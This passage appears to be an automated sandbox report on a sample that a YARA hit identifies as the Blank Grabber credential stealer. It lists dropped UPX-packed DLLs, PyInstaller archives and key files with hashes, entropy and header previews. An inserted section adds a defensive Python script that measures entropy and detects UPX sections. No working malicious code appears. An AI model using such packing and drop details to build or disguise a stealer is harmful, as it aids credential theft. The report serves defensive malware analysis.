SHA-256:D0E10445281CF3195C2A1AA4E0E937D69CAE07C492B74C9C796498DB33E9F535
SHA-512:FC63B8B48D6786CAECAF1AA3936E5F2D8FCF44A5A735F56C4200BC639D0CB9C367151A7626AA5384F6FC126A2BD0F068F43FD79277D7EC9ADFC4DCB4B8398AE2
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.*C#.D.#.D.#.D.*...'.D.l.E.!.D.l.A./.D.l.@.+.D.l.G. .D...E. .D.h.E.!.D.#.E.E.D...I...D...D.".D....".D...F.".D.Rich#.D.................PE..d......c.........." ...". ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):26384
Entropy (8bit):7.483158880239005
Encrypted:false
SSDEEP:768:yihFw4wEcpDjIJQU4p5YiSyvpKHPxWEx7M:ZwEcjIJQU437SyhKHPxDM
MD5:F1E7C157B687C7E041DEADD112D61316
SHA1:2A7445173518A342D2E39B19825CF3E3C839A5FE
SHA-256:D92EADB90AED96ACB5FAC03BC79553F4549035EA2E9D03713D420C236CD37339
SHA-512:982FD974E5892AF9F360DC4C7CCAA59928E395CCEF8EA675FADB4CF5F16B29350BF44C91EA1FD58D90CBCA02522EBA9543162E19C38817EDBFD118BC254515DA
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._XF.1.F.1.F.1.O...D.1...0.D.1...4.J.1...5.N.1...2.E.1...0.E.1...0.D.1.F.0...1...<.G.1...1.G.1.....G.1...3.G.1.RichF.1.........PE..d....~.c.........." ...".0................................................................`.............................................L.......P............`..............<...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
                                                                                                                                                                                                                                      Size (bytes):44304
                                                                                                                                                                                                                                      Entropy (8bit):7.708369428558094
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:oQ8MABQICFr2Tg+z2uPxYEV/WJqOxUbOD9p0bmIJLw1Fu5YiSyvYPxWExAGUd:oTiFtipt/MLk2sbmIJLw1FE7SygPxYd
                                                                                                                                                                                                                                      MD5:57DC6A74A8F2FAACA1BA5D330D7C8B4B
                                                                                                                                                                                                                                      SHA1:905D90741342AC566B02808AD0F69E552BB08930
                                                                                                                                                                                                                                      SHA-256:5B73B9EA327F7FB4CEFDDD65D6050CDEC2832E2E634FCBF4E98E0F28D75AD7CA
                                                                                                                                                                                                                                      SHA-512:5E2B882FC51F48C469041028B01F6E2BFAF5A49005ADE7E82ACB375709E74AD49E13D04FD7ACB6C0DBE05F06E9966A94753874132BAF87858E1A71DCFFC1DC07
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........YY..87..87..87..@...87..D6..87..D2..87..D3..87..D4..87..D6..87..86.z87..@6..87..D:..87..D7..87..D...87..D5..87.Rich.87.........................PE..d......c.........." ...".p..........`m....................................................`.............................................P.......h............ ..x...........X.......................................py..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc................p..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):57616
                                                                                                                                                                                                                                      Entropy (8bit):7.833064803996473
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:s11OB9LTyHEhkBFl837aWkr5LL08XEFIJOQFl7SysPxd:sS/LTyHRTU1k1L48XqIJOQFlyxd
                                                                                                                                                                                                                                      MD5:72A0715CB59C5A84A9D232C95F45BF57
                                                                                                                                                                                                                                      SHA1:3ED02AA8C18F793E7D16CC476348C10CE259FEB7
                                                                                                                                                                                                                                      SHA-256:D125E113E69A49E46C5534040080BDB35B403EB4FF4E74ABF963BCE84A6C26AD
                                                                                                                                                                                                                                      SHA-512:73C0E768EE0C2E6AC660338D2268540254EFE44901E17271595F20F335ADA3A9A8AF70845E8A253D83A848D800145F7ECB23C92BE90E7DD6E5400F72122D09DE
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................n............................................9.......................9.....9.......9.......9.......Rich............PE..d......c.........." ...".........`..0....p...................................0............`..........................................+..P....)....... .......................+..$...................................0...@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):63768
                                                                                                                                                                                                                                      Entropy (8bit):7.851921093820031
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:zBEP8gL60s9SRCCtqClb8pIJC7+757SyhQPxZ4:NE0OsiaClbmIJC7+9IxZ
                                                                                                                                                                                                                                      MD5:8F94142C7B4015E780011C1B883A2B2F
                                                                                                                                                                                                                                      SHA1:C9C3C1277CCA1E8FE8DB366CA0ECB4A264048F05
                                                                                                                                                                                                                                      SHA-256:8B6C028A327E887F1B2CCD35661C4C7C499160E0680CA193B5C818327A72838C
                                                                                                                                                                                                                                      SHA-512:7E29163A83601ED1078C03004B3D40542E261FDA3B15F22C2FEEC2531B05254189AE1809C71F9DF78A460BF2282635E2287617F2992B6B101854DDD74FCAD143
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4.i,4.i,4.i,=..,2.i,{.h-6.i,{.l-9.i,{.m-<.i,{.j-7.i,..h-6.i,..h-0.i,4.h,..i,..h-3.i,..d-6.i,..i-5.i,...,5.i,..k-5.i,Rich4.i,................PE..d......c.........." ..."............P.....................................................`.........................................p...d....................P......................................................`...@...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1437271
                                                                                                                                                                                                                                      Entropy (8bit):5.591062477999891
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24576:mQR5pATt7xm4lUKdcubgAnyfb030iwhJdYf9PIsoHHN:mQR5pQxmgPc
                                                                                                                                                                                                                                      MD5:1C9A020E8BFC99A77F51C7D5CEB937F1
                                                                                                                                                                                                                                      SHA1:9B2C6F0C4D16AC0B69E5232648B6E6C5DF39CD9C
                                                                                                                                                                                                                                      SHA-256:2CE10A77F29612F9AFD3FB21BAAF38162FDC484174AEC051A32EEAEF28CE8B37
                                                                                                                                                                                                                                      SHA-512:98312712C4BE133D979B9699E661C451CD8C27AE4C5ABC295C359FD857D20B3FDE55E6555BDD2230D580903BB230798FBA2C72381B263327F5D0820D28DDFBEA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PK..........!.h%..b...b......._collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):120956
                                                                                                                                                                                                                                      Entropy (8bit):7.694151487163349
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:13U3tlWj4YTIVlHMn/QKhuRdynBIT2SkpHpf77/ZU6e:12tlWj4pu/MwOzkHpf77/ZU6e
                                                                                                                                                                                                                                      MD5:0EB5FDAD2EB0292377B424E534192206
                                                                                                                                                                                                                                      SHA1:B9EC0457F7DB182B2FFC13FADCECC601BF3E32F0
                                                                                                                                                                                                                                      SHA-256:EB6462368D133919B507E6E613CCCE73A92142E8351566A24F1ADB8F771B2877
                                                                                                                                                                                                                                      SHA-512:5480F7E8DA8C535B2622B1EB88AC39EB5DDF64D3D973966655E01268CA5278E0813A93CADEA634F92BC39688975D5A21CC97B7A4A0D13C6D7FE774C2BA942DDD
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PK........8)$Z...............stub-o.pyc..........xg*I........................j.......e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.................................................................
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1107800
                                                                                                                                                                                                                                      Entropy (8bit):7.937980722134978
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24576:PwE/QASFe309yYRrVcjz8suN+2r7qL18D+/81CPwDv3uFfJm:4QBkIYPcnY/qR8DU81CPwDv3uFfJm
                                                                                                                                                                                                                                      MD5:E5AECAF59C67D6DD7C7979DFB49ED3B0
                                                                                                                                                                                                                                      SHA1:B0A292065E1B3875F015277B90D183B875451450
                                                                                                                                                                                                                                      SHA-256:9D2257D0DE8172BCC8F2DBA431EB91BD5B8AC5A9CBE998F1DCAC0FAC818800B1
                                                                                                                                                                                                                                      SHA-512:145EAA969A1A14686AB99E84841B0998CF1F726709CCD177ACFB751D0DB9AA70006087A13BF3693BC0B57A0295A48C631D0B80C52472C97EBE88BE5C528022B4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............H...H...H..#H...H..I...H..I...H..I...H..I...H...H"..Hn.I...H..I...H..I..H..I...H..OH...H..I...HRich...H........PE..d...'{.c.........." ..."..........&. 25...&..................................P7...........`......................................... H5......C5.h....@5......`2.............H7.....................................8>5.@...........................................UPX0......&.............................UPX1..........&.....................@....rsrc........@5.....................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
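The dropped-file records above carry two triage signals worth reproducing offline: the "Entropy (8bit)" figure (the UPX-packed DLLs sit at 7.7 to 7.9 bits per byte, the store-only PyInstaller zips lower) and, in each PE preview, the section names UPX0 and UPX1 that the UPX packer leaves in the section table. The script below is an added example, not Joe Sandbox's code and not part of the sample: it computes Shannon entropy in bits per byte and walks the PE section table to flag UPX-style images. Its input is a constructed stand-in PE32+ built inline (no real dropped file is embedded), and the 7.5 high-entropy threshold is this example's own choice, not a Joe Sandbox setting.

```python
import math
import struct
from collections import Counter

# Added example (not Joe Sandbox or sample code): reproduce the "Entropy (8bit)"
# figure and spot UPX-packed PE images from their section names.


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0), the metric the report calls 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_section_names(data: bytes) -> list:
    """Section names of a PE32/PE32+ image in table order; [] if the blob is not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return []
    # COFF header after the signature: NumberOfSections at +6, SizeOfOptionalHeader at +20.
    num_sections, size_opt = struct.unpack_from("<H12xH", data, e_lfanew + 6)
    table = e_lfanew + 24 + size_opt          # section table follows the optional header
    names = []
    for i in range(num_sections):
        off = table + i * 40                  # IMAGE_SECTION_HEADER is 40 bytes; Name is the first 8
        if off + 40 > len(data):
            break                             # truncated table: stop rather than read garbage
        names.append(data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"))
    return names


def triage(data: bytes, high_entropy_threshold: float = 7.5) -> dict:
    """Summarise one dropped file: entropy, PE section names, UPX-style section naming.
    The 7.5 threshold is this example's assumption, not a Joe Sandbox setting."""
    entropy = shannon_entropy(data)
    sections = pe_section_names(data)
    return {
        "entropy": round(entropy, 3),
        "sections": sections,
        "upx_packed": any(name.startswith("UPX") for name in sections),
        "high_entropy": entropy >= high_entropy_threshold,
    }


def build_fake_upx_pe() -> bytes:
    """Constructed stand-in for a dropped UPX-packed PE32+ DLL (not a real sample): DOS stub,
    PE signature, COFF header, zeroed PE32+ optional header, three UPX-style section headers
    and a uniformly distributed body."""
    e_lfanew = 0x80
    dos = bytearray(b"MZ" + b"\0" * (e_lfanew - 2))
    struct.pack_into("<I", dos, 0x3C, e_lfanew)   # e_lfanew points at the PE signature
    size_opt = 240                                 # PE32+ optional header size
    # Machine=x86-64, 3 sections, Characteristics = EXECUTABLE | LARGE_ADDRESS_AWARE | DLL
    coff = struct.pack("<HHIIIHH", 0x8664, 3, 0, 0, 0, size_opt, 0x2022)
    opt = struct.pack("<H", 0x20B) + b"\0" * (size_opt - 2)   # PE32+ magic, rest unused here
    sections = b"".join(name.ljust(8, b"\0") + b"\0" * 32
                        for name in (b"UPX0", b"UPX1", b".rsrc"))
    body = bytes(range(256)) * 4                   # every byte value equally often: 8.0 bits/byte
    return bytes(dos) + b"PE\0\0" + coff + opt + sections + body


if __name__ == "__main__":
    print(triage(build_fake_upx_pe()))
    print(triage(b"PK\x03\x04" + b"\0" * 64))     # a store-only zip header is not a PE
```

To use it on the real artefacts, read each dropped file from the sandbox's file export and pass its bytes to `triage()`; the MD5/SHA-256 values listed in the records identify which file is which. Note that `upx_packed` keys on section names only, so a repacked or renamed-section image can evade it; entropy is the complementary signal, and a UPX-packed PE whose sections have been renamed will still show the high value.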
Process: C:\Users\user\Desktop\9g9LZNE4bH.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 28504
Entropy (8bit): 7.670252824661268
Encrypted: false
SSDEEP: 768:tp/6aepjG56w24apnpiYiSyvOPxWESW7t:HA154ypi7SymPxlp
MD5: 87786718F8C46D4B870F46BCB9DF7499
SHA1: A63098AABE72A3ED58DEF0B59F5671F2FD58650B
SHA-256: 1928574A8263D2C8C17DF70291F26477A1E5E8B3B9AB4C4FF301F3BC5CE5CA33
SHA-512: 3ABF0A3448709DA6B196FE9238615D9D0800051786C9691F7949ABB3E41DFB5BDAF4380A620E72E1DF9E780F9F34E31CAAD756D2A69CAD894E9692AA161BE9F7
Malicious: false
Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.r...........................Y...........;....................................................Rich............PE..d....-c.........." ...!.@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):208224
                                                                                                                                                                                                                                      Entropy (8bit):7.926130736334921
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:dkqFpMp50kT4+NfKM8oaRdGYRNXzpAWX:dvFeH0+bSM8oaRHN
                                                                                                                                                                                                                                      MD5:7BCB0F97635B91097398FD1B7410B3BC
                                                                                                                                                                                                                                      SHA1:7D4FC6B820C465D46F934A5610BC215263EE6D3E
                                                                                                                                                                                                                                      SHA-256:ABE8267F399A803224A1F3C737BCA14DEE2166BA43C1221950E2FBCE1314479E
                                                                                                                                                                                                                                      SHA-512:835BAB65D00884912307694C36066528E7B21F3B6E7A1B9C90D4DA385334388AF24540B9D7A9171E89A4802612A8B6523C77F4752C052BF47ADBD6839BC4B92C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q&..5Gq.5Gq.5Gq.<?.9Gq.z;p.7Gq..5p.7Gq.z;t.9Gq.z;u.=Gq.z;r.1Gq..;p.6Gq.5Gp..Fq..;u..Gq..;q.4Gq..;..4Gq..;s.4Gq.Rich5Gq.........PE..d...O{.c.........." ...".....P...`.......p................................................`..........................................6..4@...3.......0...........N...........v.......................................&..@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc....P...0...H..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1703192
                                                                                                                                                                                                                                      Entropy (8bit):7.99345904201227
                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                      SSDEEP:49152:WPriKJ8yzQEPulEmHpCI0oykGS7i97GZoZwwH:WTnJ9dP4pCwGS7ca
                                                                                                                                                                                                                                      MD5:1E76961CA11F929E4213FCA8272D0194
                                                                                                                                                                                                                                      SHA1:E52763B7BA970C3B14554065F8C2404112F53596
                                                                                                                                                                                                                                      SHA-256:8A0C27F9E5B2EFD54E41D7E7067D7CB1C6D23BAE5229F6D750F89568566227B0
                                                                                                                                                                                                                                      SHA-512:EC6ED913E0142A98CD7F6ADCED5671334EC6545E583284AE10627162B199E55867D7CF28EFEAADCE9862C978B01C234A850288E529D2D3E2AC7DBBB99C6CDE9B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.K.*.K.*.K.*...+.I.*.....E.*.../.G.*.....C.*...).O.*.B..Q.*...+.@.*.K.+...*..'..*..*.J.*....J.*..(.J.*.RichK.*.........................PE..d....~.c.........." ..."..........D...]...D...................................^...........`.........................................H.].......].......].......V.@0...........^......................................].@...........................................UPX0......D.............................UPX1..........D.....................@....rsrc.........].....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):630736
                                                                                                                                                                                                                                      Entropy (8bit):6.409476333013752
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                                                                                      MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                      SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                                                                                      SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                                                                                      SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):456
                                                                                                                                                                                                                                      Entropy (8bit):4.447296373872587
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                                                                                      MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                                                                                      SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                                                                                      SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                                                                                      SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rarreg.key, Author: Joe Security
                                                                                                                                                                                                                                      Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):26392
                                                                                                                                                                                                                                      Entropy (8bit):7.437601223014864
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:GjW1JCOzGpJbNIJQG4t5YiSyvxPxWEUn:GjW1UOzcbNIJQG4z7SypPx
                                                                                                                                                                                                                                      MD5:938C814CC992FE0BA83C6F0C78D93D3F
                                                                                                                                                                                                                                      SHA1:E7C97E733826E53FF5F1317B947BB3EF76ADB520
                                                                                                                                                                                                                                      SHA-256:9C9B62C84C2373BA509C42ADBCA01AD184CD525A81CCBCC92991E0F84735696E
                                                                                                                                                                                                                                      SHA-512:2F175F575E49DE4B8B820171565AEDB7474D52AE9914E0A541D994FF9FEA38971DD5A34EE30CC570920B8618393FC40AB08699AF731005542E02A6A0095691F0
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........t..t'..t'..t'..'..t'..u&..t'..q&..t'..p&..t'..w&..t'/.u&..t'..u'..t'..u&..t'/.y&..t'/.t&..t'/..'..t'/.v&..t'Rich..t'................PE..d....~.c.........." ...".0................................................................`......................................... ...L....................`..............l...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):622352
                                                                                                                                                                                                                                      Entropy (8bit):7.993428024023682
Encrypted:true
SSDEEP:12288:jcQhjMZ2NosDnfPgxpVDnL9+pkqVtb6pS6cVgvva/lVpsFEL7:jcac29DnHgxXnL9+Hd6pSlqa/so7
MD5:ABE8EEC6B8876DDAD5A7D60640664F40
SHA1:0B3B948A1A29548A73AAF8D8148AB97616210473
SHA-256:26FC80633494181388CF382F417389C59C28E9FFEDDE8C391D95EDDB6840B20D
SHA-512:DE978D97C04BAD9EBB3F423210CBCB1B78A07C21DAADC5C166E00206ECE8DCD7BAAC1D67C84923C9CC79C8B9DFBEC719CE7B5F17343A069527BBA1A4D0454C29
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0;..QU..QU..QU..)..QU..-T..QU..-P..QU..-Q..QU..-V..QU..)T..QU..QT.RQU..-]..QU..-U..QU..-...QU..-W..QU.Rich.QU.........PE..d......c.........." ...". ...0............................................................`.............................................d"......................D...........x...........................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc....0..........."..............@......................................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):302872
Entropy (8bit):7.986888079278574
Encrypted:false
SSDEEP:6144:Vk/Qvs7yfQJYx4x9UVqHDMDNCStEQc5YmDp9Kio:VkUfQJbUV2MhCwEQc5Np9zo
MD5:908E8C719267692DE04434AB9527F16E
SHA1:5657DEF35FBD3E5E088853F805EDDD6B7B2B3CE9
SHA-256:4337D02A4B24467A48B37F1CCBCEBD1476FF10BDB6511FBB80030BBE45A25239
SHA-512:4F9912803F1FA9F8A376F56E40A6608A0B398915B346D50B6539737F9B75D8E9A905BEB5AACE5FE69BA8847D815C600EB20330E79A2492168735B5CFDCEFF39A
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t.t.t.}...r.;...v.;...y.;...|.;...w.....w.?...v.t.%.....u.....u...y.u.....u.Richt.........................PE..d....~.c.........." ...".`.......@.......P................................................`.............................................X....................P..0.......................................................@...........................................UPX0.....@..............................UPX1.....`...P...^..................@....rsrc................b..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
